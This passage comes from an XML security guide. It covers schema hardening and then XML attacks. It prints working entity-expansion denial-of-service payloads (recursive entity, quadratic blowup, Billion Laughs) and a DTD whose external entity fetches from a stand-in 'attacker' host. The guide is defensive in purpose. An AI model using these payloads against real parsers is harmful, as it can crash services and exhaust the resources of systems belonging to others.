* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
•	Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
•	Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
